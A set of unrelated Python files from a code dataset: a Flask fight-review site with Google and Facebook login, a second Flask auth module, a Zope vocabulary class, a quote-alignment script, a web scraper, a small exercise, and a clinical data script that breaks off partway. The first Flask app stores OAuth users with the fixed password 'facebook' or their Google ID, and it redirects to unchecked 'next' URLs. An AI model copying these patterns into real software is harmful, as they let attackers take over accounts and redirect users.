+{"seq_id":"77529117","text":"from myproject import app, db, GOOGLE_CLIENT_ID, GOOGLE_CLIENT_SECRET, GOOGLE_DISCOVERY_URL, client, facebook, OAuthException\nfrom flask import render_template, redirect, request, jsonify, url_for, flash, abort, session\nfrom flask_login import login_user, login_required, logout_user, current_user\nfrom datetime import datetime\nimport uuid\nimport requests\nimport json\nfrom sqlalchemy.sql import func\nfrom myproject.models import User, Comment, Review, Fight, FightCard\nfrom myproject.forms import LoginForm, RegistrationForm, CommentForm, ReviewForm, FightForm\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom flask_dance.consumer import oauth_authorized, oauth_error\n\n@app.route('/')\ndef home():\n    return render_template('home.html', cards=FightCard.query.order_by(FightCard.id.desc()).all(), #list of cards for main page\n                           maincard=FightCard.query.order_by(FightCard.id.desc()).first()) #grab most recent card for main image\n@app.route('/fuckoff')\ndef fuckoff():\n    pass\n\n@app.route('/fight_card/<int:card_id>')\ndef fight_card(card_id):\n    card = FightCard.query.filter_by(id=card_id).first_or_404(card_id)\n    return render_template('fight_card.html', fights=Fight.query.filter_by(fight_card=card.id).all(), #filters fights by fight card\n                           card=card,\n                           reviews=Review.query.all())\n\n\n@app.route('/fight_card/fight/<int:fight_id>', methods=('GET', 'POST'))\ndef fight(fight_id):\n    reviewform = ReviewForm()\n    commentform = CommentForm()\n    fight = Fight.query.filter_by(id=fight_id).first_or_404(fight_id)\n    fight_url = request.url\n    rating = Review.query.with_entities(func.avg(Review.rating)).filter(Review.fight_id == fight.id).scalar()\n    if reviewform.submitreview.data and reviewform.is_submitted():\n        review_exists = Review.query.filter_by(user_id=current_user.username, fight_id=fight.id).first()\n        if review_exists:\n            flash(\"You've already left a review for this fight!\")\n            return redirect(url_for('fight', fight_id=fight_id))\n        review = Review(rating=reviewform.rating.data,\n                        title=reviewform.title.data,\n                        content=reviewform.content.data,\n                        user_id=current_user.username,\n                        fight_id=fight.id)\n        db.session.add(review)\n        fight = Fight.query.filter_by(id=fight.id).first()\n        fight.rating = 
Review.query.with_entities(func.avg(Review.rating)).filter(Review.fight_id == fight.id).scalar()\n db.session.commit()\n flash('Review has been posted')\n return redirect(url_for('fight', fight_id=fight_id))\n if commentform.submitcomment.data and commentform.validate():\n comment = Comment(content=commentform.content.data,\n user_id=current_user.username,\n review_id=request.form.get('reviewID'))\n db.session.add(comment)\n db.session.commit()\n flash('Comment has been posted')\n return redirect(url_for('fight', fight_id=fight_id))\n return render_template('fight.html', fights=Fight.query.filter_by(id=fight_id).all(),\n reviewform=reviewform,\n fight=fight,\n commentform=commentform,\n rating=rating,\n fight_url = fight_url,\n reviews=Review.query.filter_by(fight_id=fight.id),\n comments=Comment.query.all())\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(email=form.email.data).first()\n if user == None:\n flash('User does not exist!')\n return redirect(url_for('login'))\n if user.check_password(form.password.data) and user is not None:\n\n login_user(user, remember=True)\n flash('Logged in successfully.')\n\n next = request.args.get('next')\n if next == None:\n next = url_for('home')\n\n return redirect(next)\n else:\n flash('Wrong password!')\n return redirect(url_for('login'))\n\n return render_template('login.html', form=form)\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n form = RegistrationForm()\n if form.validate_on_submit():\n email_exists = User.query.filter_by(email=form.email.data).first()\n if email_exists:\n flash('Email is already in use!')\n return redirect(url_for('register'))\n user_exists = User.query.filter_by(username=form.username.data).first()\n if user_exists:\n flash('Username is already in use!')\n return redirect(url_for('register'))\n user = User(email=form.email.data,\n username=form.username.data,\n password=form.password.data)\n db.session.add(user)\n db.session.commit()\n login_user(user, remember=True)\n flash('Thanks for registering!')\n return redirect(url_for('home'))\n return render_template('register.html', form=form)\n\ndef get_google_provider_cfg():\n return requests.get(GOOGLE_DISCOVERY_URL).json()\n\n@app.route(\"/google_login\")\ndef google_login():\n # Find out what URL to hit for Google login\n google_provider_cfg = get_google_provider_cfg()\n authorization_endpoint = google_provider_cfg[\"authorization_endpoint\"]\n\n # Use library to construct the request for Google login and provide\n # scopes that let you retrieve user's profile from Google\n request_uri = client.prepare_request_uri(authorization_endpoint,\n redirect_uri=request.base_url + \"/callback\",\n scope=[\"openid\", \"email\", \"profile\"])\n return redirect(request_uri)\n# create/login local user on successful OAuth login\n@app.route(\"/google_login/callback\")\ndef callback():\n # Get authorization code Google sent back to you\n code = request.args.get(\"code\")\n google_provider_cfg = get_google_provider_cfg()\n token_endpoint = google_provider_cfg[\"token_endpoint\"]\n token_url, headers, body = client.prepare_token_request(token_endpoint,\n authorization_response=request.url,\n redirect_url=request.base_url,\n code=code)\n token_response = requests.post(token_url,\n headers=headers,\n data=body,\n auth=(GOOGLE_CLIENT_ID, GOOGLE_CLIENT_SECRET))\n client.parse_request_body_response(json.dumps(token_response.json()))\n userinfo_endpoint = 
google_provider_cfg[\"userinfo_endpoint\"]\n uri, headers, body = client.add_token(userinfo_endpoint)\n userinfo_response = requests.get(uri, headers=headers, data=body)\n\n if userinfo_response.json().get(\"email_verified\"):\n unique_id = userinfo_response.json()[\"sub\"]\n users_email = userinfo_response.json()[\"email\"]\n users_name = userinfo_response.json()[\"name\"]\n else:\n return \"User email not available or not verified by Google.\", 400\n user = User.query.filter_by(email=users_email).first()\n if user:\n login_user(user, remember=True)\n else:\n user = User(email=users_email,\n username=users_name,\n password=unique_id)\n db.session.add(user)\n db.session.commit()\n login_user(user, remember=True)\n flash('You are logged in with Google!')\n next = request.args.get('next')\n if next == None:\n next = url_for('home')\n return redirect(next)\n\n@app.route('/facebook_login')\ndef facebook_login():\n callback = url_for('facebook_authorized',\n _external=True)\n return facebook.authorize(callback=callback)\n\n@app.route('/facebook_login/authorized')\ndef facebook_authorized():\n resp = facebook.authorized_response()\n if resp is None:\n return 'Access denied: reason=%s error=%s' % (\n request.args['error_reason'],\n request.args['error_description']\n )\n if isinstance(resp, OAuthException):\n return 'Access denied: %s' % resp.message\n\n session['oauth_token'] = (resp['access_token'], '')\n me = facebook.get('/me?fields=id,name,email')\n user = User.query.filter_by(email=me.data['email']).first()\n if user:\n login_user(user, remember=True)\n else:\n user = User(email=me.data['email'],\n username=me.data['name'],\n password=\"facebook\")\n db.session.add(user)\n db.session.commit()\n login_user(user, remember=True)\n flash('You are logged in with Facebook!')\n next = request.args.get('next')\n if next == None:\n next = url_for('home')\n return redirect(next)\n\n@facebook.tokengetter\ndef get_facebook_oauth_token():\n return session.get('oauth_token')\n\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n flash('You are logged out!')\n next = request.args.get('next')\n if next == None:\n next = url_for('home')\n return redirect(next)\n\napplication = app\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"379498393","text":"from flask import request\nfrom flask import session\nfrom flask import url_for\nfrom flask import jsonify\nfrom flask import Blueprint\nfrom flask import render_template\nfrom flask import redirect\n\nfrom ..models import User\n\n\nmain = Blueprint('auth', __name__)\n\ndef current_user():\n username = session.get('username', '')\n u = User.query.filter_by(username=username).first()\n return u\n\n\n@main.route('/login')\ndef login_view():\n return render_template('login.html')\n\n@main.route('/login', methods=['POST'])\ndef login():\n form = request.get_json()\n username = form.get('username', '') \n user = User.user_by_name(username)\n\n r = {\n 'success': False,\n 'message': '登录失败',\n }\n\n #验证用户名和密码\n if user is not None and user.validate_auth(form):\n r['success'] = True\n r['next'] = request.args.get('next',url_for('controller.index_view'))\n session.permanent = True\n session['username'] = username\n return jsonify(r)\n\n@main.route('/register', methods=['POST'])\ndef register():\n form = request.get_json()\n u = User(form)\n r = {\n 'success': True,\n }\n 
status, msgs = u.register_validate()\n if status:\n u.save()\n r['success'] = True\n r['next'] = request.args.get('next', url_for('controller.index_view'))\n session.permanent = True\n session['username'] = u.username\n else:\n r['success'] = False\n r['message'] = '\\n'.join(msgs)\n return jsonify(r) \n\n@main.route('/logout')\ndef logout():\n session['username'] = None\n return render_template('index.html', user=None)\n\n","sub_path":"app/auth/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"406952868","text":"##############################################################################\n#\n# Copyright (c) 2004 Zope Corporation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"PageletChooser vocabulary\n\n$Id:$\n\"\"\"\n__docformat__ = 'restructuredtext'\n\nfrom zope.interface import directlyProvides\n\nfrom zope.schema.vocabulary import SimpleTerm\nfrom zope.schema.vocabulary import SimpleVocabulary\n\nfrom zope.app import zapi\n\nfrom zope.app.component.interface import queryInterface\n\nfrom zope.app.pagelet.interfaces import IPagelet\n\nfrom zope.app.pageletchooser.exceptions import \\\n PageletVocabularyInterfaceLookupError\nfrom zope.app.pageletchooser.exceptions import \\\n PageletError_vocabulary_interface_not_found\n\nfrom zope.app.pageletchooser.interfaces import IChooseablePagelets\n\n\n\nclass Wrapper:\n \"\"\"Dummy class used to provide an interface.\"\"\"\n\n\n\nclass PageletNamesVocabulary(SimpleVocabulary):\n \"\"\"A vocabulary of optional pagelet macro names for a given interface.\n\n Imports:\n \n >>> import zope.component\n >>> from zope.interface import Interface\n >>> from zope.security.checker import defineChecker\n >>> from zope.publisher.interfaces.browser import IBrowserRequest\n >>> from zope.component.interfaces import IView\n >>> from zope.app.pagelet.interfaces import IPagelet\n >>> from zope.app.pagelet.interfaces import IPageletSlot\n >>> from zope.app.pagelet.tests import TestPagelet\n >>> from zope.app.pagelet.tests import TestContext\n >>> from zope.app.pagelet.tests import testChecker\n\n Setup:\n\n >>> from zope.app.tests import setup, ztapi\n >>> setup.placefulSetUp()\n\n Register interfaces used for pagelet and vocabulary:\n\n >>> from zope.app.component.interface import provideInterface\n >>> utilities = zapi.getGlobalService(zapi.servicenames.Utilities)\n >>> provideInterface('', IBrowserRequest, None)\n >>> provideInterface('', IView, None)\n >>> provideInterface('', IChooseablePagelets, None)\n\n Register pagelet:\n\n >>> name = 'testpagelet'\n >>> pagelet_factory = TestPagelet\n >>> defineChecker(pagelet_factory, testChecker)\n >>> adaptersrv = zope.component.getService('Adapters')\n >>> adaptersrv.register(\n ... (Interface, IBrowserRequest, IView, IPageletSlot)\n ... 
, IPagelet, name, pagelet_factory)\n\n Register vocabulary:\n \n >>> from zope.app.pagelet.tests import TestContext\n >>> name=\"chooseablepageletnames\"\n >>> factory=\".vocabulary.PageletNamesVocabulary\"\n >>> layer=\"zope.publisher.interfaces.browser.IBrowserRequest\"\n >>> view=\"zope.component.interfaces.IView\"\n >>> slot=\"zope.app.pageletchooser.interfaces.IChooseablePagelets\"\n >>> obj = TestContext()\n >>> vocab = PageletNamesVocabulary(obj, layer, view, slot)\n\n Test vocabulary:\n\n >>> \"testpagelet\" in vocab\n True\n\n >>> \"nothing\" in vocab\n False\n\n >>> setup.placefulTearDown()\n\n \"\"\"\n def __init__(self, context, layer, view, slot):\n macronames = []\n terms = []\n \n # get and check interface\n layeriface = queryInterface(layer)\n if layeriface is None:\n raise PageletVocabularyInterfaceLookupError(\n PageletError_vocabulary_interface_not_found, layer)\n\n viewiface = queryInterface(view)\n if viewiface is None:\n raise PageletVocabularyInterfaceLookupError(\n PageletError_vocabulary_interface_not_found, view)\n\n slotiface = queryInterface(slot)\n if slotiface is None:\n raise PageletVocabularyInterfaceLookupError(\n PageletError_vocabulary_interface_not_found, slot)\n\n # prepare objects for looking up the adapters\n layerwrapper = Wrapper()\n directlyProvides(layerwrapper, layeriface)\n \n viewwrapper = Wrapper()\n directlyProvides(viewwrapper, viewiface)\n \n slotwrapper = Wrapper()\n directlyProvides(slotwrapper, slotiface)\n \n # collect pagelets\n objects = context, layerwrapper, viewwrapper, slotwrapper\n pagelets = zapi.getAdapters(objects, IPagelet)\n pagelets.sort(lambda x, y: x[1].weight - y[1].weight)\n\n for name, pagelet in pagelets:\n macronames.append(name)\n\n for name in macronames:\n terms.append(SimpleTerm(name, name, name))\n\n terms.sort(lambda lhs, rhs: cmp(lhs.title, rhs.title))\n super(PageletNamesVocabulary, self).__init__(terms)\n","sub_path":"Zope3/tags/before-blow-services-merge/src/zope/app/pageletchooser/vocabulary.py","file_name":"vocabulary.py","file_ext":"py","file_size_in_byte":5096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"270792999","text":"'''\r\nThis script takes the compiled results and aligns quotes\r\nbetween documents that the scholar is interested in. If no documents\r\nare listed, this operates on the entire corpus, but can be very slow\r\ndepending on corpus size.\r\n'''\r\n\r\nimport pickle, os, time, sys\r\nimport numpy as np\r\nimport json\r\nimport re\r\n\r\nimport Levenshtein\r\nfrom multiprocessing import Pool\r\nfrom itertools import repeat, chain\r\n\r\n#********************#\r\n# DOCUMENTS TO ALIGN #\r\n#********************#\r\n\r\n# Align quotes occurring between the following documents. Provide at\r\n# least two. If None, all quotes will be aligned. 
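For reference, the pair set that the main logic later builds from alignment_docs keeps both orderings of every pair and skips self-pairs; itertools.permutations expresses the same construction more compactly (a sketch, not this script's actual code):

from itertools import permutations

docs = ["doc_a", "doc_b", "doc_c"]  # stand-ins for real document titles
pairs = set(permutations(docs, 2))  # ordered pairs, no (a, a) entries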
If your corpus contains\r\n# significant reuse, this may be slow.\r\nalignment_docs = None\r\n#[\"003 卷耳-前漢-毛\", \"003 卷耳-唐-孔穎達\", \"006 桃夭-唐-孔穎達\", \"007 兔罝-唐-孔穎達\", \"009 漢廣-唐-孔穎達\", \"011 麟之趾-前漢-毛\", \"011 麟之趾-唐-孔穎達\", \"011 麟之趾-後漢-鄭玄\", \"017 行露-唐-孔穎達\", \"017 行露-後漢-鄭玄\", \"020 摽有梅-唐-孔穎達\", \"024 何彼襛矣-前漢-毛\", \"024 何彼襛矣-唐-孔穎達\", \"025 騶虞-前漢-毛\", \"025 騶虞-唐-孔穎達\", \"031 擊鼓-前漢-毛\", \"031 擊鼓-唐-孔穎達\", \"031 擊鼓-後漢-鄭玄\", \"032 凱風-前漢-毛\", \"032 凱風-唐-孔穎達\", \"037 旄丘-前漢-毛\", \"037 旄丘-唐-孔穎達\", \"037 旄丘-後漢-鄭玄\", \"047 君子偕老-前漢-毛\", \"047 君子偕老-唐-孔穎達\", \"048 桑中-前漢-毛\", \"048 桑中-唐-孔穎達\", \"048 桑中-後漢-鄭玄\", \"050 定之方中-前漢-毛\", \"050 定之方中-唐-孔穎達\", \"050 定之方中-後漢-鄭玄\", \"065 黍離-唐-孔穎達\", \"065 黍離-後漢-鄭玄\"]\r\n\r\n\r\n#**********************#\r\n# ALIGNMENT PARAMETERS #\r\n#**********************#\r\n\r\n# Match, mismatch, and gap scores\r\nMATCHSCORE = 1\r\nMISALIGNSCORE = -1\r\nMISMATCHSCORE = -1\r\n\r\n# Limit the length of text that will be aligned\r\n# This significantly speeds up the algorithm when\r\n# aligning very long quotes. This divides the quotes\r\n# into blocks of CHUNKLIM length. It tries to divide\r\n# the chunks in places where the alignment is exact.\r\n# So OVERLAP looks at the 10 characters before and after\r\n# the proposed break. When it finds RANGEMATCH exact\r\n# characters, it inserts a break in the middle.\r\nCHUNKLIM = 200\r\nOVERLAP = 10\r\nRANGEMATCH = 6\r\n\r\n\r\n#************************#\r\n# Input and output files #\r\n#************************#\r\n# Input\r\nCORPUSRESULTS = \"corpus_results.txt\"\r\n# Output\r\nOUTPUTFILE = \"corpus_alignment.txt\"\r\n\r\n\r\n\r\n#****************#\r\n# GLOBAL TRACKER #\r\n#****************#\r\n# to track alignment progress\r\ntracker = 0\r\n\r\n#**********************#\r\n# FUNCTION DEFINITIONS #\r\n#**********************#\r\n\r\n# Divide texts into smaller chunks of a certain maximum length\r\n# To optimize for later alignment, divide texts in areas of high\r\n# homology\r\ndef divtexts(quote1, quote2, chunklimit,overlap,rangecheck):\r\n chunks = len(quote1)//chunklimit\r\n qs1 = 0\r\n qs2 = 0\r\n chunkedTexts = []\r\n for chunk in range(chunks + 1):\r\n if chunk != chunks:\r\n tqe1 = (chunk+1)*chunklimit\r\n tqe2 = (chunk+1)*chunklimit\r\n\r\n # retrieve the boundary region\r\n tqr1 = quote1[tqe1-rangecheck:tqe1+rangecheck]\r\n tqr2 = quote2[tqe2-rangecheck:tqe2+rangecheck]\r\n\r\n # identify a stretch of identical overlap and save the midpoint\r\n qe1 = None\r\n qe2 = None\r\n for i in range(len(tqr1)-overlap):\r\n for j in range(len(tqr2)-overlap):\r\n if tqr1[i:i+overlap] == tqr2[j:j+overlap]:\r\n qe1 = tqe1 - rangecheck + i + overlap//2\r\n qe2 = tqe2 - rangecheck + j + overlap//2\r\n # If no region is identified, just cut at initial boundary\r\n if not qe1:\r\n qe1 = tqe1\r\n qe2 = tqe2\r\n\r\n # save the cut region\r\n chunkedTexts.append([quote1[qs1:qe1],quote2[qs2:qe2]])\r\n\r\n # move the start of the next chunk to the end of the last one\r\n qs1 = qe1\r\n qs2 = qe2\r\n else:\r\n if len(quote1[qs1:]) == 0 or len(quote2[qs2:]) == 0:\r\n chunkedTexts[-1][0] += quote1[qs1:]\r\n chunkedTexts[-1][1] += quote2[qs2:]\r\n else:\r\n chunkedTexts.append([quote1[qs1:],quote2[qs2:]])\r\n return chunkedTexts\r\n\r\n# Algorithm used for quote alignment. 
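A toy illustration of how divtexts() behaves, with a deliberately small chunk limit (the values below are chosen only for the example; the module-level constants are what the script actually uses):

a = "the quick brown fox jumps"
b = "the quikc brown fox jumps"
# Each entry is a [chunk_of_a, chunk_of_b] pair whose boundary falls inside
# an exactly-matching region when one can be found near the cut point.
for c1, c2 in divtexts(a, b, chunklimit=10, overlap=4, rangecheck=3):
    print(repr(c1), repr(c2))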
Insights into how this works come from the original\r\n# Needleman-Wunsch article, but also from http://www.biorecipes.com/DynProgBasic/code.html\r\ndef align(quote1, quote2,matchscore=MATCHSCORE,misalignscore=MISALIGNSCORE,mismatchscore=MISMATCHSCORE, chunklim=CHUNKLIM):\r\n\r\n # The alignment algorithm is O(n^2) so only aligning short chunks speeds\r\n # the process up. Here I divide each sequence into smaller chunks for\r\n # alignment and then recombine them at the end.\r\n if len(quote1) > chunklim:\r\n textchunks = divtexts(quote1, quote2, CHUNKLIM, OVERLAP, RANGEMATCH)\r\n else:\r\n textchunks = [[quote1, quote2]]\r\n\r\n # Empty strings to store the calculated quotes\r\n total_quote_1 = \"\"\r\n total_quote_2 = \"\"\r\n\r\n # Iterate through each of the divided texts\r\n for texts in textchunks:\r\n\r\n # Create alignment matrix\r\n matrix = np.zeros([len(texts[0])+1,len(texts[1])+1])\r\n # prep matrix:\r\n for i in range(len(texts[0])+1):\r\n matrix[i][0] = -i\r\n for j in range(len(texts[1])+1):\r\n matrix[0][j] = -j\r\n\r\n\r\n # Iterate through both texts and fill out the matrix\r\n for i in range(len(texts[0])):\r\n for j in range(len(texts[1])):\r\n # Get characters to compare\r\n c1 = texts[0][i]\r\n c2 = texts[1][j]\r\n\r\n # If they are the same, give them the matching score.\r\n # Otherwise, give them the mismatch score\r\n if c1 == c2:\r\n score = matchscore\r\n else:\r\n score = mismatchscore\r\n\r\n # get the pertinent matrix location (which will be both plus one)\r\n matrixrow = i+1\r\n matrixcolumn = j+1\r\n\r\n # Calculate scores from top, left, and diagonal\r\n upperscore = matrix[i][j+1] + misalignscore\r\n leftscore = matrix[i+1][j] + misalignscore\r\n diagonal = matrix[i][j] + score\r\n\r\n # Select the highest score and place it in the box\r\n currentscore = max([upperscore, leftscore, diagonal])\r\n matrix[matrixrow][matrixcolumn] = currentscore\r\n\r\n # Create two empty strings for the traceback\r\n stringa = \"\"\r\n stringb = \"\"\r\n\r\n # Traceback to get the best alignment\r\n # Begin at the bottom right corner\r\n i = len(matrix)-1\r\n j = len(matrix[0])-1\r\n\r\n # Get the final score\r\n finalscore = matrix[i][j]\r\n\r\n # While i or j is above zero, trace backwards\r\n while i > 0 or j > 0:\r\n # Get the maximum value from the adjacent squares\r\n left = matrix[i][j - 1]\r\n upper = matrix[i-1][j]\r\n diagonal = matrix[i-1][j-1]\r\n maxval = max([left, upper, diagonal])\r\n\r\n # If the maximum value is the diagonal, move diagonally\r\n if maxval == diagonal:\r\n i -= 1\r\n j -= 1\r\n stringa = texts[0][i] + stringa\r\n try:\r\n stringb = texts[1][j] + stringb\r\n except IndexError:\r\n print(texts, i, j)\r\n # If the maximum value is to the left, insert gap into stringa\r\n elif maxval == left:\r\n j -= 1\r\n stringa = \" \"+stringa\r\n stringb = texts[1][j] + stringb\r\n # If the maximum value is above, insert gap into stringb\r\n elif maxval == upper:\r\n i -= 1\r\n stringa = texts[0][i] + stringa\r\n stringb = \" \"+stringb\r\n\r\n # add all parts of the string together\r\n total_quote_1 += stringa\r\n total_quote_2 += stringb\r\n\r\n # Trim the bits left over from the search algorithm. 
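A small usage sketch for align(): both returned strings always come back the same length, because every traceback step appends exactly one character (or a space standing in for a gap) to each side. With the default scores, one plausible result is:

s1, s2 = align("ABCDE", "ABDE")
assert len(s1) == len(s2)
print(s1)  # e.g. 'ABCDE'
print(s2)  # e.g. 'AB DE', the space marking the gap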
In certain edge cases\r\n # the ends are not the same\r\n # IW: Commented, uncomment the following lines to trim\r\n # while total_quote_1[-1] == \" \" or total_quote_2[-1] == \" \":\r\n # total_quote_1 = total_quote_1[:-1]\r\n # total_quote_2 = total_quote_2[:-1]\r\n # while total_quote_1[-1] != total_quote_2[-1]:\r\n # total_quote_1 = total_quote_1[:-1]\r\n # total_quote_2 = total_quote_2[:-1]\r\n\r\n return total_quote_1, total_quote_2\r\n\r\n# IW: Retrieve text from the original corpus\r\ndef original(data,orig):\r\n data[6] = get_original(data, orig, 0, 4, 6)\r\n data[7] = get_original(data, orig, 1, 5, 7)\r\n return data\r\n\r\n# IW: Get the original segment with the newly added spaces\r\ndef get_original(data, metadata, a, b, c):\r\n start = int(data[b])\r\n end = int(data[b]) + len(data[c])\r\n res = metadata[data[a]][start:end]\r\n\r\n if ' ' in data[c]:\r\n spaces = [m.start() for m in re.finditer(' ', data[c])]\r\n for pos in spaces:\r\n res = insert_space(res,pos)\r\n return res[:len(data[c])]\r\n\r\n# IW: Insert spaces to match aligned text\r\ndef insert_space(text, pos):\r\n return text[:pos]+' '+text[pos:]\r\n\r\n# Run the process\r\ndef runalignment(content,totallength,orig=False):\r\n global tracker\r\n info = content.split(\"\\t\")\r\n # If the quotes are identical, no need to align them\r\n if float(info[3]) != 1.0:\r\n # Run the alignment algorithm\r\n aligneda, alignedb = align(info[6], info[7])\r\n\r\n # Save the information\r\n info[6] = aligneda\r\n info[7] = alignedb\r\n\r\n # IW: Retrieve text from original corpus\r\n # useful if variants were replaced in prepare_corpus\r\n if orig is not False:\r\n info = original(info,orig)\r\n\r\n content = \"\\t\".join(info)\r\n tracker += 1\r\n if tracker % 1000 == 0:\r\n sys.stdout.write(f\"{tracker} out of {totallength} aligned \\r\")\r\n sys.stdout.flush()\r\n return content\r\n\r\n#*********************#\r\n# START OF MAIN LOGIC #\r\n#*********************#\r\n\r\nif __name__=='__main__':\r\n # Start a global timer\r\n gs = time.time()\r\n\r\n # Initialize process pool for parallel processing\r\n pool = Pool()\r\n runtimes = []\r\n save_contents = []\r\n\r\n # Results container\r\n results = []\r\n # Iterate through each line in the file aligning the results using map\r\n with open(CORPUSRESULTS, \"r\") as rf:\r\n contents = rf.read().split(\"\\n\")\r\n contents = contents[1:]\r\n\r\n # If alignment_docs have been provided, extract the relevant quotes\r\n if alignment_docs:\r\n use_contents = []\r\n pairs = set()\r\n for t1 in alignment_docs:\r\n for t2 in alignment_docs:\r\n if t1 != t2:\r\n pairs.add((t1, t2))\r\n\r\n for line in contents:\r\n info = line.split(\"\\t\")\r\n pair = (info[0], info[1])\r\n if pair in pairs:\r\n use_contents.append(line)\r\n contents = use_contents\r\n\r\n # IW: Open json where the original text has been stored\r\n # only if prepare_corpus.py was used with -v option\r\n try:\r\n with open('./corpus.json','r') as of:\r\n orig = json.load(of)\r\n results = pool.starmap(runalignment,zip(contents,repeat(len(contents)),repeat(orig)))\r\n except FileNotFoundError:\r\n print('There are no variants in your corpus or you chose not to take them into account')\r\n results = pool.starmap(runalignment,zip(contents,repeat(len(contents))))\r\n\r\n\r\n # Remove blank results\r\n save_contents = [s for s in results if len(s) > 0]\r\n\r\n with open(OUTPUTFILE, \"w\") as wf:\r\n wf.write(\"\\n\".join(save_contents))\r\n\r\n ge = time.time()\r\n gt = ge-gs\r\n print(f\"Global Operation 
completed in {gt:.2f} seconds\")\r\n","sub_path":"align_quotes.py","file_name":"align_quotes.py","file_ext":"py","file_size_in_byte":12067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"524962533","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom csv import writer\n\n\nresponse = requests.get('https://chaldal.com/powder-mixes') #put the url of webpage\n\nsoup = BeautifulSoup(response.text, 'html.parser')\n\nwith open('chalDal_Beverage_syrupPowderdrinks','w',newline='') as csv_file: # csv file name; newline='' avoids blank rows on Windows\n\tcsv_writer = writer(csv_file)\n\theaders = ['ImageUrl', 'Name','Quantity','Price'] #headers of csv file\n\tcsv_writer.writerow(headers)\n\n\tproducts = soup.find_all(class_='product')\n\n\tfor product in products:\n\t\timage = product.find('img')['src'] # get image source\n\t\tname = product.find(class_='name').get_text() #get name from class = name\n\t\tquantity = product.find(class_='subText').get_text()\n\t\tprice = product.find(class_='price').get_text()\n\t\t# print(image,name,quantity,price)\n\t\tcsv_writer.writerow([image,name,quantity,price]) #write row wise data in csv file\n\n\n","sub_path":"websrape.py","file_name":"websrape.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"298555950","text":"'''For this, I had to check the condition for a perfect square and include that\ncondition too. Once done, it worked like a charm.'''\n\nimport math\n\n\ndef is_smart_number(num):\n val = int(math.sqrt(num))\n if val ** 2 == num:\n return True\n return False\n\n\nfor _ in range(int(input())):\n num = int(input())\n ans = is_smart_number(num)\n if ans:\n print(\"YES\")\n else:\n print(\"NO\")\n","sub_path":"Debugging/Is Smart Number.py","file_name":"Is Smart Number.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"331922216","text":"\"\"\"\nEstimate individuals in the non-Marketscan correction factor inputs\n\nas of 3/21/2019 we have 3 non-MS sources that the clinical team preps\nPHL, USA HCUP SID and NZL NMDS.\n\nThis is a helper script that each CF input script will call to get\nfrom admissions to individual cases. Since this is based on the marketscan\nclaims process we'll import some modules from there\n\"\"\"\n\nimport itertools\nimport time\nimport pandas as pd\n\nfrom clinical_info.Functions import hosp_prep\nfrom clinical_info.Mapping import clinical_mapping\nfrom clinical_info.Claims.query_ms_db import marketscan_estimate_indv as mei\n\ndef clean_bad_ids(df):\n \"\"\"\n If a patient ID includes multiple ages or sexes we don't want to use it\n \"\"\"\n print(\"df shape with missing pat IDs is {}\".format(df.shape))\n # drop missing patient IDs\n df = df[df.patient_id != \".\"]\n df = df[df.age.notnull()]\n if df.shape[0] == 0:\n print(\"This source is missing unique patient ids\")\n # return a blank dataframe b/c we can't use this source\n # these are currently only certain HCUP states\n # but will check it to make sure all jobs finished\n return pd.DataFrame()\n\n print(\"df shape is\", df.shape)\n # drop duplicates by ID and sex\n x = df[['patient_id', 'sex_id']].drop_duplicates()\n # keep only IDs that are duplicated i.e. 
that have multiple sex IDs for them\n x = x[x.duplicated(subset=['patient_id'])]\n # drop enrollee IDs with 2 sexes associated\n df = df[~df.patient_id.isin(x.patient_id)]\n print(\"there were {} bad patient IDs due to multiple sexes\".format(x.shape[0]))\n\n dfG = df.copy()\n dfG['age_min'] = dfG['age']\n dfG['age_max'] = dfG['age']\n # create age min and max by enrollee ID groups\n dfG = dfG.groupby(['patient_id']).agg({'age_min': 'min', 'age_max': 'max'}).reset_index()\n min_age_df = dfG[['patient_id', 'age_min']].copy()\n # find the difference beween min and max\n dfG['age_diff'] = dfG['age_max'] - dfG['age_min']\n # drop where difference is greater than 1 year\n dfG = dfG[dfG.age_diff > 1]\n print(\"there were {} bad patient IDs due to large age differences\".format(dfG.shape[0]))\n\n df = df[~df.patient_id.isin(dfG.patient_id)]\n del x\n\n # the difference in patient ages is causing problems with the counts\n # ie someone is 49 on their first visit and 50 on the second, but they're\n # admitted twice in a year for the same bundle id\n # so take only the patient's youngest age on record\n df = df.merge(min_age_df, how='left', on='patient_id')\n df['age_diff'] = df['age'] - df['age_min']\n print(\"age diffs are\", df['age_diff'].value_counts(dropna=False))\n assert df['age_diff'].max() <= 1\n df.drop(['age', 'age_diff'], axis=1, inplace=True)\n df.rename(columns={'age_min': 'age'}, inplace=True)\n del dfG\n\n # remove null ages and sexes values\n df = df[df['age'].notnull() & df['sex_id'].notnull()]\n\n # remove sexes that need to be age split\n df = df[df.sex_id != 9]\n\n print(df.patient_id.unique().size)\n return df\n\ndef expandgrid(*itrs):\n # create a template df with every possible combination of\n # age/sex/year/location to merge results onto\n # define a function to expand a template with the cartesian product\n product = list(itertools.product(*itrs))\n 